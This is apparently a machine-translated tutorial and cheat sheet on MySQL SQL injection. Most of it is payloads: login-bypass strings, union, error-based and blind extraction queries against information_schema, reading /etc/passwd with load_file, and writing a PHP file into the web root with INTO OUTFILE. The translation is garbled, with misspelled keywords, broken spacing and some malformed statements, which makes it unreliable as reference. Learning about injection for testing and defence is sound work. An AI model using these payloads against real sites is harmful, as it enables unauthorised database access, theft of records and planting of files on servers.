SQL Injection Essential Basics _ Database Other

What is SQL injection (SQL injection)

A SQL injection attack is an attacker who inserts a SQL command into the input field of a Web form or a query string for a page request, tricking the server into executing a malicious SQL command. In some forms, user-entered content is used directly to construct (or affect) dynamic SQL commands, or as input parameters for stored procedures, which are particularly vulnerable to SQL injection attacks.

MySQL Common notes

#

--[space] or--+

/*...*/

In the process of attention, these annotations may need to be urlencode.

MySQL Authentication bypass

;%0 0

' Or 1=1 #

'/*!or * * 1=1--+

MySQL Connectors

Use + to connect in MySQL.

SELECT * from users where username= ' Zhangsan ' and ' ab ' = "a" + "B";

Common functions in MySQL

In the SQL injection process, the built-in functions in MySQL are used. In the built-in function, it is divided into functions and functions of obtaining information.

Information functions are used to obtain information about the database in MySQL, and functional functions are traditional functions used to accomplish an operation.

The commonly used information functions are:

database() that is used to get the database information currently in use

version():returns the version of the database, equivalent to@@version

user()：returns the current user, equivalent to the Current_User parameter. Such as:

Select User (); #root @localhost
Select Current_User; #root @localhost

@@datadir, gets the location where the database is stored.

SELECT @ @datadir; #D: \xampp\mysql\data\

The common functional functions are:

load_file():Loads a file from the computer to read the data in the file.

SELECT * FROM Users Union select 1,load_file ('/etc/passwd '), 3;
SELECT * FROM Users Union select 1,load_file (0x2f6574632f706173737764), 3; #使用16进制绕过单引号限制

into outfile：Write to file, provided that you have write permission

Select ' <?php phpinfo ();?> ' into outfile '/var/www/html/xxx.php ';
Select char (60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/ Xxx.php ';

concat():Returns a string resulting from a connection parameter. If one of the arguments is NULL, the return value is null.

Usage is as follows:

Select Concat (Username,password) from users;

*concat_ws(): Is concat_ws() the special form, the first parameter is a separator, the remaining parameter is the field name.

Select Concat_ws (', ', Username,password) from users;

group_concat(): Used to merge the results in multiple records.

Usage is as follows:

Select Group_concat (username) from users;
#返回的就是users表中所有的用户名, and is returned as a record.

subtring(), which is substr(): used to truncate the string. The usage is: substr(str,pos,length) Note that POS starts at 1.

Select SUBSTR ((select Database ()), 1, 1);

ascii():Use returns the ASCII value of the character.

Select ASCII (' a '); #97

length():Returns the length of the string.

Such as:

Select Length ("123456") #返回6

is(exp1,exp2,exp2):Returns EXP2 if the EXP1 expression is true, otherwise returns EXP3.

Such as:

Select 1,2,if (1=1,3,-1) #1, 2,3
selecrt 1,2,if (1=2,3,-1) #1, 2,-1

These are the functions that are commonly used in SQL injection engineering. There are, of course, many functions that are not used.

now():returns the current system time

hex():returns the 16 binary of a string

unhex():reverse the Hex () of the 16 binary

@@basedir():Reverse MySQL installation directory

@@versin_compile_os:Operating System

MySQL Database meta information

In MySQL exists information_schema is an information database, in this database saves the MySQL server to save all other database information, such as database name, database table, table field name

and access rights. The informa_schema tables commonly used in are:

schemata: All the database information in MySQL is stored, and the return content is the same as the result of show databases.

tables: Information that stores tables in a database. Describes in detail which schema, table type, and table engine a table belongs to.

The result of the show's tables from Secuiry is from this table.

columns: A detailed description of all the columns of a table and information about each column.

Show columns from users is the result of this table

The following is the use of the above 3 tables to get information about the database.

Select Database (); #查选数据库
Select schema_name from information_schema.schemata limit 0,1 #查询数据库
Select table_name from Information_ Schema.tables where table_schema=database () limit 0, 1; #查询表
Select column_name from Information_schema.columns where table_name= ' users ' limit 0,1; #查询列

SQL injection Type

SQL injection types can be roughly divided into regular SQL injection and SQL blinds. SQL Blinds can also be divided into time based blinds and blinds based on Web content.
There are a lot of explanations on the internet about the SQL blind, and there's no explanation for that too much. With regard to the concept of blind, there are specific examples to facilitate the description.
In the time delay injection, the commonly used functions include if() and sleep() function.

The basic SQL expressions are as follows:

SELECT * from users where id=1 and if (length (User ()) =14,sleep (3), 1);
SELECT * from the users where id=1 and if (Mid (User (), 1,1) = ' R ', Sleep (3), 1);

Wide byte injection

For wide byte injection, you can refer to the wide byte injection detail. Wide-byte input is typically caused by a mismatch between the page encoding and the database encoding. For wide byte injection, use%D5 or%DF to bypass

MySQL Common statement Summary

General Injection

1 ' ORDER by NUM #  determine field length
1 ' union Select 1,2,3 # Determine field length
-1 ' Union Select 1,2,3 # Judge the field displayed in the page
-1 ' union Sele CT 1,2,group_concat (schema_name) from Information_schema.schemata #显示mysql中所有的数据库
-1 ' union Select 1,2 Group_ CONCAT (table_name) from information_schema.tables where table_schame = "dbname"/database ()/hex (dbname) #
-1 ' union Select 1,2,column_name from Information_schema.columns where table_name= "table_name" limit 0,1 #
-1 ' union Select 1,2 , Group_concat (column_name) from Information_schema.columns where table_name= "table_name"/HEX (table_name) limit 0,1 #
-1 ' union Select 1,2,3 and ' 1 ' = ' 1  in case the annotation character is not available

Double SQL Search

 select Concat (0x3a,0x3a, select Database (), 0x3a,0x3a), select COUNT (*), concat (0x3a,
0X3A, (select Database ()), 0x3a,0x3a,floor (rand () *2)) A from Information_schema.tables group by A;
Select Concat (0x3a,0x3a, select Database ()), 0x3a,0x3a,floor (rand () *2)) a from information_schema.tables; Select COUNT (*), concat (0x3a,0x3a, select Database ()), 0x3a,0x3a,floor (rand () *2)) A from information_schema.tables Group by A; #这种sql语句的写法, commonly used in SQL blind. Get information about the database select COUNT (*), concat (0X3A,0X3A, select table_name from information_schema.table where table_schema= Database () Limi 0,1), 0x3a,0x3a,floor (rand () *2)) A from Information_schema.tables group by A; #得到数据库的表的信息 #利用姿势如下: 1 ' and (select 1 from (SELECT COUNT (*), concat (0X3A,0X3A, select table_name from INFORMATION_SCHEMA . table where Table_schema=database () Limi 0,1), 0x3a,0x3a,floor (rand () *2)) (A from Information_schema.tables group by a) b) --+

This use of the posture is through the MySQL execution of SQL command error information to get the required information, in the following article will be the writing of a detailed analysis.

BOOL Blind

1 ' and ASCII (substr (select Database (), 1,1)) >99
1 ' and ASCII (SUBSTR (select table_name from Information_ Schema.tables limit 0,1), 1,1) >90

The bool blind is the information that occurs when the content of the page that corresponds to the execution of the return value of the SQL statement is true or false.

Time Blind

1 ' and select if ((select substr (table_name,1,1) from Information_schema.tables where table_schema=database () limit 0,1) = ' E ', Sleep (ten), NULL) +
1 ' and select if (substr (select table_name from information_schema.tables where table_schema= Database () limit 0,1), 1,1) = ' E ', Sleep (a), null)--+

All 2 of the above methods are equivalent, and the time blind remainder routine SQL injection method is different. Time blinds need to be used generally if() and sleep() functions. Then, depending on the length of the page's return content, sleep() you know whether the function is executing.

sleep()get the information you need based on whether the function is executing.

Summarize

This is the basic knowledge of SQL injection, and the next article will explain the knowledge in SQL injection in more detail, and today's article is primarily a basic knowledge. Friends who are interested in SQL injection please continue to focus on the cloud-dwelling community.